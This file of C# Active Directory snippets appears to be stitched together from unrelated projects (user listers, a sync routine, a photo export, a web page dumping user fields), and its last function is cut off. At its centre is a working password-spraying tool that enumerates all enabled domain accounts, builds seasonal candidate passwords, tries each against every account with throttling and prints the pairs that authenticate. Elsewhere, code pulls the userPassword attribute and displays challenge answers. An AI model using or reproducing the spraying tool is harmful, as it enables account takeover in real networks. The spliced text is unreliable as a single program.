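public static List<ADUser> GetUsers(string domain, string username, string password)
{
    List<ADUser> users = new List<ADUser>();

    // Null is treated like "no credentials" instead of throwing from Any().
    bool useExplicitCredentials = !string.IsNullOrEmpty(username);

    using (DirectoryEntry searchRoot = useExplicitCredentials
        ? new DirectoryEntry(domain, username, password)
        : new DirectoryEntry(domain))
    using (DirectorySearcher directorySearcher = new DirectorySearcher(searchRoot))
    {
        // Set the filter
        directorySearcher.Filter = "(&(objectCategory=person)(objectClass=user))";

        // Set the properties to load.
        directorySearcher.PropertiesToLoad.Add(CanonicalNameProperty);
        directorySearcher.PropertiesToLoad.Add(SamAccountNameProperty);
        directorySearcher.PropertiesToLoad.Add(LastLoginProperty);
        directorySearcher.PropertiesToLoad.Add(PwdLastSetProperty);
        directorySearcher.PropertiesToLoad.Add(DescriptionProperty);
        directorySearcher.PropertiesToLoad.Add(UserAccountControlProperty);

        try
        {
            using (SearchResultCollection searchResultCollection = directorySearcher.FindAll())
            {
                foreach (SearchResult searchResult in searchResultCollection)
                {
                    // Only the explicit-credentials path shortened long descriptions
                    // in the original code; that difference is kept as is.
                    // NOTE(review): unclear whether the asymmetry is intended.
                    users.Add(ReadAdUser(searchResult, useExplicitCredentials));
                }
            }
        }
        catch (Exception e)
        {
            MessageBox.Show(e.Message, "Error: Cannot Retrieve User Information");
        }
    }

    // Return all found users.
    return users;
}

/// <summary>Copies the loaded attributes of one search result into a new ADUser.</summary>
private static ADUser ReadAdUser(SearchResult searchResult, bool truncateDescription)
{
    var user = new ADUser();

    // Set CN if available.
    if (searchResult.Properties[CanonicalNameProperty].Count > 0)
    {
        user.CN = searchResult.Properties[CanonicalNameProperty][0].ToString();
    }

    // Set sAMAccountName if available
    if (searchResult.Properties[SamAccountNameProperty].Count > 0)
    {
        user.SamAcountName = searchResult.Properties[SamAccountNameProperty][0].ToString();
    }

    // Description (optionally shortened to 60 characters plus an ellipsis)
    if (searchResult.Properties[DescriptionProperty].Count > 0)
    {
        user.Description = searchResult.Properties[DescriptionProperty][0].ToString();
        if (truncateDescription && user.Description.Length >= 65)
        {
            user.Description = user.Description.Substring(0, 60) + "...";
        }
    }

    // Last Login
    if (searchResult.Properties[LastLoginProperty].Count > 0)
    {
        user.LastLogin = (long)searchResult.Properties[LastLoginProperty][0];
    }

    // Password Last Set
    if (searchResult.Properties[PwdLastSetProperty].Count > 0)
    {
        user.PwdLastSet = (long)searchResult.Properties[PwdLastSetProperty][0];
    }

    // User Account Control
    if (searchResult.Properties[UserAccountControlProperty].Count > 0)
    {
        user.UserAccountControl = DescribeAccountStatus(searchResult.Properties[UserAccountControlProperty][0].ToString());
    }

    return user;
}

/// <summary>
/// Maps a userAccountControl value to "Enabled" or "Disabled".
/// </summary>
/// <remarks>
/// The previous lookup table listed individual flag combinations (512, 514,
/// 66048, ...) and reported every unlisted value as "Enabled", so a disabled
/// account carrying any other flag combination was shown as enabled. Testing
/// the ACCOUNTDISABLE bit (0x2) gives the same answer for every value the
/// table contained and the correct answer for the rest. Values that are not
/// numeric still fall back to "Enabled", as before.
/// </remarks>
private static string DescribeAccountStatus(string userAccountControl)
{
    const int AccountDisableFlag = 0x2;

    if (userAccountControl == "Disabled")
    {
        return "Disabled";
    }

    int flags;
    bool parsed = int.TryParse(
        userAccountControl,
        System.Globalization.NumberStyles.Integer,
        System.Globalization.CultureInfo.InvariantCulture,
        out flags);

    return parsed && (flags & AccountDisableFlag) != 0 ? "Disabled" : "Enabled";
}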
// Entry point of a console tool that (1) lists enabled accounts from Active
// Directory, (2) builds or accepts a list of candidate passwords and (3) calls
// ValidateCredentials for every account with each candidate, printing the
// pairs that authenticate.
//
// Defender's view: the run consists of one paged LDAP query for every enabled
// account followed by one authentication attempt per account per candidate,
// all from a single host at a fixed interval. Expect bursts of failed-logon
// events spread over many distinct accounts from one source (for example
// Windows Security events 4625, 4771 or 4776, depending on the protocol that
// Negotiate selects). Account lockout policy, banned-password lists and MFA
// are the controls this pattern runs into.
//
// Arguments read below: --Passwords and --Seeds (comma-separated lists),
// --Delay (milliseconds between attempts), --Sleep (minutes between rounds).
static void Main(string[] args)
{
    // NOTE(review): TrimStart is invoked before the null check, so an unset
    // LOGONSERVER raises NullReferenceException instead of reaching the message.
    string LogonServer = Environment.GetEnvironmentVariable("LOGONSERVER").TrimStart('\\');
    if (LogonServer == null)
    {
        Console.WriteLine("[-] Failed to retrieve the LOGONSERVER the environment variable; the script will exit.");
        return;
    }
    List <string> UserList = new List <string>();
    int minPwdLength = new int();
    int lockoutThreshold = new int();
    string Seeds = null;
    string Passwords = null;
    int Delay = new int();
    int Sleep = new int();
    // Minimal argument parser: each recognised switch consumes the next element.
    for (int i = 0; i < args.Length; i++)
    {
        if (args[i] == "--Passwords")
        {
            Passwords = args[i + 1];
        }
        else if (args[i] == "--Seeds")
        {
            Seeds = args[i + 1];
        }
        else if (args[i] == "--Delay")
        {
            Delay = int.Parse(args[i + 1]);
        }
        else if (args[i] == "--Sleep")
        {
            Sleep = int.Parse(args[i + 1]);
        }
    }
    try
    {
        // Binds to the server named by the computer site's InterSiteTopologyGenerator.
        DirectoryEntry dEntry = new DirectoryEntry("LDAP://" + System.DirectoryServices.ActiveDirectory.ActiveDirectorySite.GetComputerSite().InterSiteTopologyGenerator.Name);
        DirectorySearcher dSearch = new DirectorySearcher(dEntry);
        // Person objects that have a sAMAccountName and do not have bit 2 of
        // userAccountControl set (bitwise-AND matching rule), i.e. not disabled.
        dSearch.Filter = "(&(objectCategory=Person)(sAMAccountName=*)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))";
        dSearch.PageSize = 1000;
        dSearch.PropertiesToLoad.Add("sAMAccountName");
        dSearch.SearchScope = SearchScope.Subtree;
        SearchResultCollection results = dSearch.FindAll();
        if (results != null)
        {
            for (var i = 0; i < results.Count; i++)
            {
                UserList.Add((string)results[i].Properties["sAMAccountName"][0]);
            }
        }
        else
        {
            Console.WriteLine("[-] Failed to retrieve the usernames from Active Directory; the script will exit.");
            return;
        }
        if (UserList != null)
        {
            int UserCount = UserList.Count;
            Console.WriteLine("[+] Successfully collected " + UserCount + " usernames from Active Directory.");
            // NOTE(review): this reads minPwdLength, so the value printed as
            // "Lockout Threshold" is the minimum password length; no lockout
            // attribute is read anywhere in this block.
            lockoutThreshold = (int)dEntry.Properties["minPwdLength"].Value;
            Console.WriteLine("[*] The Lockout Threshold for the current domain is " + lockoutThreshold + ".");
            minPwdLength = (int)dEntry.Properties["minPwdLength"].Value;
            Console.WriteLine("[*] The Min Password Length for the current domain is " + minPwdLength + ".");
        }
        else
        {
            Console.WriteLine("[-] Failed to create a list the usernames from Active Directory; the script will exit.");
            return;
        }
    }
    catch
    {
        // Any failure during the directory lookup ends the run with one generic message.
        Console.WriteLine("[-] Failed to find or connect to Active Directory; the script will exit.");
        return;
    }
    List <string> SeedList = new List <string>();
    List <string> PasswordList = new List <string>();
    // Candidate list: explicit --Passwords wins, then --Seeds, otherwise seeds
    // derived from the previous, current and next month and their seasons.
    // GeneratePasswords and GetSeason are defined outside this block.
    if (Passwords != null)
    {
        PasswordList = Passwords.Split(',').ToList();
    }
    else if (Seeds != null)
    {
        SeedList = Seeds.Split(',').ToList();
        PasswordList = GeneratePasswords(SeedList, minPwdLength);
    }
    else
    {
        List <string> SeasonList = new List <string>();
        List <string> MonthList = new List <string>();
        System.DateTime Today = System.DateTime.Today;
        System.DateTime Month = new DateTime(Today.Year, Today.Month, 1);
        SeasonList.Add(GetSeason(Month.AddMonths(-1)).ToString());
        SeasonList.Add(GetSeason(Month).ToString());
        SeasonList.Add(GetSeason(Month.AddMonths(1)).ToString());
        MonthList.Add(Month.AddMonths(-1).ToString("MMMM"));
        MonthList.Add(Month.ToString("MMMM"));
        MonthList.Add(Month.AddMonths(1).ToString("MMMM"));
        SeedList = SeasonList.Distinct().Concat(MonthList.Distinct()).ToList();
        PasswordList = GeneratePasswords(SeedList, minPwdLength);
    }
    if (PasswordList == null)
    {
        Console.WriteLine("[-] The PasswordList variable is empty; the script will exit.");
        return;
    }
    Console.WriteLine("[+] Successfully generated a list of " + PasswordList.Count + " passwords.");
    Console.WriteLine("[*] Starting password spraying operations.");
    if (Delay > 0)
    {
        Console.WriteLine("[*] Using a delay of " + Delay + " milliseonds between attempts.");
    }
    else
    {
        Console.WriteLine("[*] Using the default delay of 1000 milliseonds between attempts.");
    }
    // Outer loop: one round per candidate; inner loop: one attempt per account.
    foreach (string Password in PasswordList)
    {
        // Candidate passwords are written to the console in clear text.
        Console.WriteLine("[*] Using password " + Password);
        foreach (string UserName in UserList)
        {
            bool Flag = false;
            try
            {
                // A new PrincipalContext against LogonServer is created for every attempt.
                using (PrincipalContext principalContext = new PrincipalContext(ContextType.Domain, LogonServer))
                {
                    Flag = principalContext.ValidateCredentials(UserName, Password, ContextOptions.Negotiate);
                }
            }
            catch (PrincipalServerDownException)
            {
                // Despite the message, execution continues with the next statement.
                Console.WriteLine("[-] Failed to retrieve the domain name; the script will exit.");
            }
            if (Flag == true)
            {
                Console.WriteLine("[+] Successfully authenticated with " + UserName + "::" + Password);
            }
            else
            {
                //Console.WriteLine("[-] Authentication failed with " + UserName + "::" + Password);
            }
            // Fixed pause between attempts: Delay milliseconds, or 1000 when unset.
            if (Delay > 0)
            {
                Thread.Sleep(Delay);
            }
            else
            {
                Thread.Sleep(1000);
            }
        }
        Console.WriteLine("[*] Completed all rounds with password " + Password);
        // Optional pause of Sleep minutes between rounds.
        if (Sleep > 0)
        {
            int Duration = (int)TimeSpan.FromMinutes(Sleep).TotalMilliseconds;
            Console.WriteLine("[*] Now the script will sleep for " + TimeSpan.FromMilliseconds(Duration).TotalMinutes.ToString() + " minutes.");
            Thread.Sleep(Duration);
        }
    }
    Console.WriteLine("[*] Completed all password spraying operations.");
}
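// User lookup from AD
#region AD
/// <summary>
/// Searches the directory of the given domain and maps every hit to a
/// <c>CuentaUsuario</c>.
/// </summary>
/// <param name="dominio">Domain identifier; resolved to a directory path by getRutaDominio and copied into each result's Dominio.</param>
/// <param name="tipoFiltro">Filter type handed to getLDAPFilter.</param>
/// <param name="criterio">Search criterion handed to getLDAPFilter.</param>
/// <returns>One CuentaUsuario per search result; an empty list when nothing matches.</returns>
/// <remarks>
/// NOTE(review): the LDAP filter is built by getLDAPFilter, which is not visible
/// here. If <paramref name="criterio"/> can come from a user, verify that the
/// helper escapes filter metacharacters (RFC 4515) before concatenating.
/// </remarks>
public List<CuentaUsuario> getUsuarioDeDirectorioActivo(string dominio, string tipoFiltro, string criterio)
{
    List<CuentaUsuario> listaUsuario = new List<CuentaUsuario>();
    string rutaDominio = this.getRutaDominio(dominio);
    string filtroDirectorio = getLDAPFilter(tipoFiltro, criterio);

    // All three directory objects wrap native handles; release them deterministically.
    using (DirectoryEntry oDirectorioEntrada = new DirectoryEntry(rutaDominio))
    using (DirectorySearcher oBuscaDirectorio = new DirectorySearcher(oDirectorioEntrada, filtroDirectorio))
    {
        oBuscaDirectorio.PageSize = 10;
        oBuscaDirectorio.PropertiesToLoad.AddRange(new[]
        {
            "givenName",
            "samaccountname",
            "mail",
            "company",
            "title",
            "sn",
            "mobile",
            "telephoneNumber",
            "c",
            "physicalDeliveryOfficeName",
            "department",
            // SECURITY(review): this requests the userPassword attribute and the
            // loop below copies it into CuentaUsuario.Clave. Kept because callers
            // may read Clave, but a credential attribute should not be pulled into
            // an application object; confirm whether anything still needs it and
            // drop it if not. In Active Directory this attribute is normally an
            // octet string, in which case the (string) cast below would throw for
            // any populated value - TODO confirm against the target directory.
            "userPassword",
            "postalCode"
        });

        using (SearchResultCollection Data = oBuscaDirectorio.FindAll())
        {
            foreach (SearchResult oResultado in Data)
            {
                CuentaUsuario oCuentaUsuario = new CuentaUsuario();
                string valor;

                if ((valor = PrimerValorDeTexto(oResultado, "givenName")) != null)
                {
                    oCuentaUsuario.Nombre = valor;
                }

                if ((valor = PrimerValorDeTexto(oResultado, "samaccountname")) != null)
                {
                    oCuentaUsuario.Alias = valor;
                }

                if ((valor = PrimerValorDeTexto(oResultado, "mail")) != null)
                {
                    oCuentaUsuario.CorreoElectronico = valor;
                }

                if ((valor = PrimerValorDeTexto(oResultado, "company")) != null)
                {
                    oCuentaUsuario.Organizacion = valor;
                }

                if ((valor = PrimerValorDeTexto(oResultado, "title")) != null)
                {
                    oCuentaUsuario.Cargo = valor;
                }

                if ((valor = PrimerValorDeTexto(oResultado, "sn")) != null)
                {
                    // "sn" may hold two surnames separated by a space: the first
                    // goes to ApellidoPaterno, the second to ApellidoMaterno.
                    oCuentaUsuario.ApellidoPaterno = valor;
                    string[] apellidos = oCuentaUsuario.ApellidoPaterno.Split(' ');
                    if (apellidos.Length > 1)
                    {
                        oCuentaUsuario.ApellidoPaterno = apellidos[0];
                        oCuentaUsuario.ApellidoMaterno = apellidos[1];
                    }
                }

                if ((valor = PrimerValorDeTexto(oResultado, "mobile")) != null)
                {
                    oCuentaUsuario.TelefonoMovil = valor;
                }

                if ((valor = PrimerValorDeTexto(oResultado, "telephoneNumber")) != null)
                {
                    oCuentaUsuario.TelefonoTrabajo = valor;
                }

                if ((valor = PrimerValorDeTexto(oResultado, "c")) != null)
                {
                    oCuentaUsuario.Pais = valor;
                }

                if ((valor = PrimerValorDeTexto(oResultado, "userPassword")) != null)
                {
                    oCuentaUsuario.Clave = valor;
                }

                if ((valor = PrimerValorDeTexto(oResultado, "physicalDeliveryOfficeName")) != null)
                {
                    oCuentaUsuario.Ubigeo = valor;
                }

                if ((valor = PrimerValorDeTexto(oResultado, "department")) != null)
                {
                    oCuentaUsuario.Area = valor;
                }

                // postalCode is reused by this application as the document number.
                if ((valor = PrimerValorDeTexto(oResultado, "postalCode")) != null)
                {
                    oCuentaUsuario.NumeroDocumento = valor;
                }

                oCuentaUsuario.Dominio = dominio;
                listaUsuario.Add(oCuentaUsuario);
            }
        }
    }

    return listaUsuario;
}

/// <summary>
/// Returns the first value of <paramref name="propiedad"/> cast to string, or
/// null when the result carries no value for that attribute.
/// </summary>
private static string PrimerValorDeTexto(SearchResult resultado, string propiedad)
{
    ResultPropertyValueCollection valores = resultado.Properties[propiedad];
    return valores.Count > 0 ? (string)valores[0] : null;
}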
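/// <summary>
/// Queries the configured directory for user entries and, on Active Directory,
/// also for deleted (tombstoned) users, and returns them as one list.
/// </summary>
/// <param name="force">Passed to BuildRevisionFilter together with the last user sync date.</param>
/// <returns>
/// A completed task holding the users built by BuildUser; results for which
/// BuildUser returns null are skipped. The directory calls themselves are
/// synchronous - the task is only a wrapper around the finished list.
/// </returns>
/// <exception cref="ApplicationException">
/// Sync settings are missing, user sync is switched off, no directory server is
/// configured, or the caller is not authenticated.
/// </exception>
private static Task<List<UserEntry>> GetUsersAsync(bool force = false)
{
    var settings = SettingsService.Instance;

    // The null check on Sync used to come after Sync.SyncUsers had already been
    // read, so a missing sync section surfaced as NullReferenceException and the
    // intended message was unreachable. Check for null first.
    if (settings.Sync == null)
    {
        throw new ApplicationException("No configuration for sync.");
    }

    if (!settings.Sync.SyncUsers)
    {
        throw new ApplicationException("Not configured to sync users.");
    }

    if (settings.Server?.Ldap == null)
    {
        throw new ApplicationException("No configuration for directory server.");
    }

    if (!AuthService.Instance.Authenticated)
    {
        throw new ApplicationException("Not authenticated.");
    }

    var users = new List<UserEntry>();

    var userEntry = settings.Server.Ldap.GetUserDirectoryEntry();
    var filter = BuildBaseFilter(settings.Sync.Ldap.UserObjectClass, settings.Sync.UserFilter);
    filter = BuildRevisionFilter(filter, force, settings.LastUserSyncDate);

    // The search base and the complete filter are written to the console.
    Console.WriteLine("User search: {0} => {1}", userEntry.Path, filter);

    // Searcher and result collection hold native resources; dispose both.
    using (var searcher = new DirectorySearcher(userEntry, filter))
    using (var result = searcher.FindAll())
    {
        foreach (SearchResult item in result)
        {
            var user = BuildUser(item, false);
            if (user != null)
            {
                users.Add(user);
            }
        }
    }

    // Deleted users
    if (settings.Server.Type == DirectoryType.ActiveDirectory)
    {
        var deletedEntry = settings.Server.Ldap.GetBasePathDirectoryEntry();
        var deletedFilter = BuildBaseFilter(settings.Sync.Ldap.UserObjectClass, "(isDeleted=TRUE)");
        deletedFilter = BuildRevisionFilter(deletedFilter, force, settings.LastUserSyncDate);

        // Tombstone = true asks the server to include deleted objects.
        using (var deletedSearcher = new DirectorySearcher(deletedEntry, deletedFilter) { Tombstone = true })
        using (var deletedResult = deletedSearcher.FindAll())
        {
            foreach (SearchResult item in deletedResult)
            {
                var user = BuildUser(item, true);
                if (user != null)
                {
                    users.Add(user);
                }
            }
        }
    }

    return Task.FromResult(users);
}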
/// <summary>
/// Lists every object under the resolved distinguished name that carries an
/// ms-ds-creatorsid value and prints which principal created it.
/// </summary>
/// <param name="container">Forwarded to GetMAQDistinguishedName.</param>
/// <param name="distinguishedName">Forwarded to GetMAQDistinguishedName; replaced by its result.</param>
/// <param name="domain">Forwarded to GetMAQDistinguishedName.</param>
/// <param name="domainController">Host used in every LDAP path built here.</param>
/// <param name="verbose">Forwarded to GetMAQDistinguishedName.</param>
/// <param name="credential">Used for the binds when its UserName is non-empty; otherwise the current context is used.</param>
/// <remarks>
/// Audit use: the output shows which accounts have created machine accounts,
/// which is the information needed to review how the domain's machine account
/// quota is being consumed. Search-level exceptions are printed and rethrown;
/// a failure to resolve one creator falls back to printing its SID.
/// </remarks>
public static void GetMachineAccountCreator(string container, string distinguishedName, string domain, string domainController, bool verbose, NetworkCredential credential)
{
    distinguishedName = GetMAQDistinguishedName(null, container, distinguishedName, domain, verbose);

    bool hasCredentials = !String.IsNullOrEmpty(credential.UserName);
    string serverPrefix = "LDAP://" + domainController + "/";
    string searchPath = serverPrefix + distinguishedName;

    DirectoryEntry directoryEntry = hasCredentials
        ? new DirectoryEntry(searchPath, credential.UserName, credential.Password)
        : new DirectoryEntry(searchPath);

    try
    {
        DirectorySearcher directorySearcher = new DirectorySearcher(directoryEntry)
        {
            SearchRoot = directoryEntry,
            PageSize = 1000,
            Filter = "(&(ms-ds-creatorsid=*))",
            SearchScope = System.DirectoryServices.SearchScope.Subtree
        };
        SearchResultCollection searchResults = directorySearcher.FindAll();

        if (searchResults.Count == 0)
        {
            Console.WriteLine("[-] No results found in {0}", distinguishedName);
        }

        foreach (SearchResult hit in searchResults)
        {
            // The creator is stored as a binary SID; convert it to string form.
            byte[] rawCreatorSid = (byte[])hit.Properties["ms-ds-creatorsid"][0];
            string creatorSID = new SecurityIdentifier(rawCreatorSid, 0).Value;
            string machineAccount = (string)hit.Properties["Name"][0];

            // Second RDN of the DN, i.e. the object's immediate parent container.
            string fullDn = (string)hit.Properties["distinguishedName"][0];
            string accountContainer = fullDn.Split(',')[1];

            string principle = "";
            string principalDistingushedName = "";

            try
            {
                string sidPath = serverPrefix + "<SID=" + creatorSID + ">";
                DirectoryEntry creatorEntry = hasCredentials
                    ? new DirectoryEntry(sidPath, credential.UserName, credential.Password)
                    : new DirectoryEntry(sidPath);

                object upn = creatorEntry.Properties["userPrincipalname"].Value;
                if (upn != null)
                {
                    principle = upn.ToString();
                }
                else
                {
                    principle = creatorEntry.Properties["sAMAccountName"].Value.ToString();
                    // Not used afterwards, but the read stays: if it throws, the
                    // catch below replaces the name with the SID.
                    principalDistingushedName = creatorEntry.Properties["distinguishedName"].Value.ToString();
                }

                creatorEntry.Dispose();
            }
            catch
            {
                // Creator could not be resolved; show the raw SID instead.
                principle = creatorSID;
            }

            Console.WriteLine("[+] Account {0} is the creator of {1} in {2}", principle, machineAccount, accountContainer);
        }
    }
    catch (Exception ex)
    {
        Console.WriteLine(ex.ToString());
        throw;
    }

    if (!String.IsNullOrEmpty(directoryEntry.Path))
    {
        directoryEntry.Dispose();
    }
}
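/// <summary>
/// Writes a dump of every user object found under the entry returned by
/// GetDirectoryEntry to the HTTP response, one block per user separated by
/// a horizontal rule. Does nothing when the request carries testing=true.
/// </summary>
/// <remarks>
/// Directory attribute values are HTML-encoded before being written: several
/// of these attributes can be edited by the account owner or by delegated
/// staff, so writing them raw lets stored markup run in the viewer's browser.
/// SECURITY(review): the page also emits extensionAttribute1/2, which the
/// original comments label as challenge question and challenge response, and
/// no authorization check is visible in this handler. Confirm that access to
/// this page is restricted and that those two fields need to be shown at all.
/// </remarks>
protected void Page_Load(object sender, EventArgs e)
{
    if (Request["testing"] == "true")
    {
        return;
    }

    // The disabled JBilling and QuickBooks experiments that used to sit here as
    // commented-out code have been removed; they were never executed.

    DirectoryEntry entry = GetDirectoryEntry();

    // Searcher and result collection wrap native handles; release them.
    using (DirectorySearcher dSearch = new DirectorySearcher(entry))
    {
        // Get all user entries from the active directory.
        dSearch.Filter = "(&(objectClass=user))";

        using (SearchResultCollection allUsers = dSearch.FindAll())
        {
            foreach (SearchResult sResultSet in allUsers)
            {
                // A Guid renders as hex digits and dashes only, so it needs no encoding.
                Response.Write(new Guid((byte[])sResultSet.Properties["objectguid"][0]) + "<br />");
                WriteEncodedProperty(sResultSet, "cn");
                WriteEncodedProperty(sResultSet, "cn");                       // Login Name
                WriteEncodedProperty(sResultSet, "givenName");                // First Name
                WriteEncodedProperty(sResultSet, "initials");                 // Middle Initials
                WriteEncodedProperty(sResultSet, "sn");                       // Last Name

                // Address: up to two ';'-separated parts. The second part is
                // optional; indexing it unconditionally threw on single-line
                // addresses.
                string tempAddress = GetProperty(sResultSet, "homePostalAddress");
                if (tempAddress != string.Empty)
                {
                    string[] addressArray = tempAddress.Split(';');
                    Response.Write(Server.HtmlEncode(addressArray[0]));
                    if (addressArray.Length > 1)
                    {
                        Response.Write(Server.HtmlEncode(addressArray[1]));
                    }
                }

                WriteEncodedProperty(sResultSet, "title");                    // title
                WriteEncodedProperty(sResultSet, "company");                  // company
                WriteEncodedProperty(sResultSet, "st");                       // state
                WriteEncodedProperty(sResultSet, "l");                        // city
                WriteEncodedProperty(sResultSet, "co");                       // country
                WriteEncodedProperty(sResultSet, "postalCode");               // postal code
                Response.Write("telephone number: " + Server.HtmlEncode(GetProperty(sResultSet, "telephoneNumber"))); // telephone number
                WriteEncodedProperty(sResultSet, "otherTelephone");           // extension
                WriteEncodedProperty(sResultSet, "facsimileTelephoneNumber"); // fax
                WriteEncodedProperty(sResultSet, "mail");                     // email address
                WriteEncodedProperty(sResultSet, "extensionAttribute1");      // Challenge Question
                WriteEncodedProperty(sResultSet, "extensionAttribute2");      // Challenge Response
                WriteEncodedProperty(sResultSet, "extensionAttribute3");      // Member Company
                WriteEncodedProperty(sResultSet, "extensionAttribute4");      // Company Relationship Exists
                WriteEncodedProperty(sResultSet, "extensionAttribute5");      // status
                WriteEncodedProperty(sResultSet, "extensionAttribute6");      // Assigned Sales Person
                WriteEncodedProperty(sResultSet, "extensionAttribute7");      // Accept T and C
                WriteEncodedProperty(sResultSet, "extensionAttribute8");      // jobs

                // Overnight e-mail settings: the first three ';'-separated parts
                // go to the console, not to the response. Fewer than three parts
                // used to raise IndexOutOfRangeException; now what exists is used.
                string tEmail = GetProperty(sResultSet, "extensionAttribute9");
                if (tEmail != string.Empty)
                {
                    string[] emailArray = tEmail.Split(';');
                    string joined = string.Empty;
                    for (int i = 0; i < emailArray.Length && i < 3; i++)
                    {
                        joined += emailArray[i];
                    }
                    Console.Write(joined);
                }

                WriteEncodedProperty(sResultSet, "extensionAttribute10");     // email daily emerging market
                WriteEncodedProperty(sResultSet, "extensionAttribute11");     // email daily corporate market
                WriteEncodedProperty(sResultSet, "extensionAttribute12");     // AssetMgt Range
                WriteEncodedProperty(sResultSet, "whenCreated");              // date of account created
                WriteEncodedProperty(sResultSet, "whenChanged");              // date of account changed
                Response.Write("<hr />");
            }
        }
    }
}

/// <summary>Writes one directory attribute to the response, HTML-encoded.</summary>
private void WriteEncodedProperty(SearchResult result, string propertyName)
{
    Response.Write(Server.HtmlEncode(GetProperty(result, propertyName)));
}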
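/// <summary>
/// SQL CLR procedure: searches the directory under <paramref name="ADpath"/> with
/// <paramref name="ADfilter"/> and sends back one row per object that carries a
/// thumbnailphoto value (object GUID, image width/height/format, raw photo bytes).
/// </summary>
/// <param name="ADpath">ADsPath to bind to; handed to DirectoryEntry unchanged.</param>
/// <param name="ADfilter">LDAP filter; handed to DirectorySearcher unchanged.</param>
/// <remarks>
/// Both arguments reach the directory exactly as the SQL caller supplied them, and the bind
/// uses no explicit credentials. Anyone allowed to execute this procedure can therefore run
/// any search the hosting identity may run, so restrict EXECUTE permission accordingly.
/// Progress and failures are reported through SqlContext.Pipe; exceptions are rethrown.
/// </remarks>
public static void clr_GetADusersPhotos(SqlString ADpath, SqlString ADfilter)
{
    SearchResultCollection results = null;
    Int32 itemcount = 0;

    try
    {
        DataTable tbl = new DataTable();
        tbl.Columns.Add("ObjectGUID", typeof(Guid));
        tbl.Columns.Add("Width", typeof(int));
        tbl.Columns.Add("Height", typeof(int));
        tbl.Columns.Add("Format", typeof(string));
        tbl.Columns.Add("Photo", typeof(byte[]));

        // The root entry and the searcher wrap native ADSI handles; the original never
        // released them, so every call leaked both.
        using (DirectoryEntry entry = new DirectoryEntry((string)ADpath))
        using (DirectorySearcher searcher = new DirectorySearcher(entry))
        {
            searcher.Filter = (string)ADfilter;
            searcher.PageSize = 500;
            results = searcher.FindAll();

            foreach (SearchResult searchResult in results)
            {
                itemcount++;

                // One DirectoryEntry is opened per result; dispose it before moving on so a
                // large result set does not accumulate open handles.
                using (DirectoryEntry item = searchResult.GetDirectoryEntry())
                {
                    PropertyValueCollection prop = Util.GetADproperty(item, "thumbnailphoto");
                    if (prop == null)
                    {
                        continue;
                    }

                    // Read the image header; a failure is reported as a warning and the row
                    // is still emitted with NULL size columns.
                    ImgSize imgsize = new ImgSize(0, 0, "xxx");
                    try
                    {
                        imgsize = ImageHeader.GetDimensions((byte[])prop[0]);
                    }
                    catch (Exception ex)
                    {
                        SqlContext.Pipe.Send("Warning: Get image size failed for user (" + Util.GetDistinguishedName(item) + ")" + " Exception: " + ex.Message);
                    }

                    DataRow row = tbl.NewRow();
                    row[0] = item.Guid;
                    if (!imgsize.IsEmpty()) // Size columns stay NULL unless the header was read.
                    {
                        row[1] = imgsize.Width;
                        row[2] = imgsize.Height;
                        row[3] = imgsize.Format;
                    }
                    row[4] = prop[0];
                    tbl.Rows.Add(row);
                }
            }
        }

        // Return dataset to SQL server.
        ReturnDatasetToSqlServer(tbl);
    }
    catch (System.Runtime.InteropServices.COMException)
    {
        SqlContext.Pipe.Send("COMException in clr_GetADusersPhotos. ItemCounter = " + itemcount.ToString());
        throw;
    }
    catch (InvalidOperationException)
    {
        SqlContext.Pipe.Send("InvalidOperationException in clr_GetADusersPhotos. ItemCounter = " + itemcount.ToString());
        throw;
    }
    catch (NotSupportedException)
    {
        SqlContext.Pipe.Send("NotSupportedException in clr_GetADusersPhotos. ItemCounter = " + itemcount.ToString());
        throw;
    }
    catch (Exception)
    {
        SqlContext.Pipe.Send("Exception in clr_GetADusersPhotos. ItemCounter = " + itemcount.ToString());
        throw;
    }
    finally
    {
        // SearchResultCollection must be disposed explicitly to release the search handle.
        if (results != null)
        {
            results.Dispose();
            results = null;
        }
    }
}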
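/// <summary>
/// Searches the connected server (and container, for an application directory) for
/// contact objects and resolves each one to a <c>ContactPrincipal</c>.
/// </summary>
/// <param name="maxRecords">Maximum number of results to process; zero or negative means no cap.</param>
/// <returns>
/// The resolved contacts. Entries that fail to resolve are skipped; the list may hold
/// whatever <c>FindByIdentity</c> returns for a DN it cannot match.
/// </returns>
public List<ContactPrincipal> GetChildContactObjects(int maxRecords)
{
    // Pick the bind path up front. The original created a default DirectoryEntry first and
    // then replaced it, abandoning the first instance without disposing it.
    string rootPath = null;
    if (ContextType == ContextType.Domain)
    {
        rootPath = string.Format("LDAP://{0}", ConnectedServer);
    }
    else if (ContextType == ContextType.ApplicationDirectory)
    {
        rootPath = string.Format("LDAP://{0}/{1}", ConnectedServer, Container);
    }

    var children = new List<ContactPrincipal>();

    // Entry, searcher and result collection all hold native handles; release them on every path.
    using (var directoryDe = rootPath == null ? new DirectoryEntry() : new DirectoryEntry(rootPath))
    using (var search = new DirectorySearcher(directoryDe)
    {
        Tombstone = false,
        Asynchronous = true,
        PageSize = 100,
        Filter = "(objectClass=contact)"
    })
    using (var results = search.FindAll())
    {
        var processed = 0;
        foreach (SearchResult result in results)
        {
            processed++;
            if (maxRecords > 0 && processed > maxRecords)
            {
                break;
            }

            // The DN is taken as the last '/'-separated segment of the ADsPath.
            // NOTE(review): a DN that itself contains '/' would be cut short here - confirm
            // whether such names can occur in this directory.
            var pieces = result.Path.Split('/');
            var dn = pieces[pieces.Length - 1];

            try
            {
                children.Add(ContactPrincipal.FindByIdentity(this, IdentityType.DistinguishedName, dn));
            }
            catch
            {
                // Deliberately best effort: one unresolvable contact must not abort the listing.
                // NOTE(review): failures are dropped without a trace; consider logging the DN.
            }
        }
    }

    return children;
}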
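/// <summary>
/// Returns the dNSHostName of every computer object found through the first entry in
/// <c>DomainControllers</c>.
/// </summary>
/// <returns>
/// The list of host names, or <c>null</c> when <c>DomainControllers</c> is empty.
/// </returns>
/// <remarks>
/// When <c>Config.TargetDc</c> is set it is appended to <c>DomainControllers</c>; otherwise
/// <c>GetDomainControllers()</c> is called. The loop either returns or rethrows during its first
/// iteration, so later domain controllers are never tried even though the loop suggests a fallback.
/// </remarks>
private List<string> GetDomainComputers()
{
    if (Config.TargetDc != null)
    {
        DomainControllers.Add(Config.TargetDc);
    }
    else
    {
        GetDomainControllers();
    }

    var domainComputers = new List<string>();

    foreach (var domainController in DomainControllers)
    {
        try
        {
            // TODO add support for user defined creds here.
            using (var entry = new DirectoryEntry("LDAP://" + domainController))
            using (var mySearcher = new DirectorySearcher(entry))
            {
                mySearcher.Filter = ("(objectClass=computer)");

                // No size limit, reads all objects.
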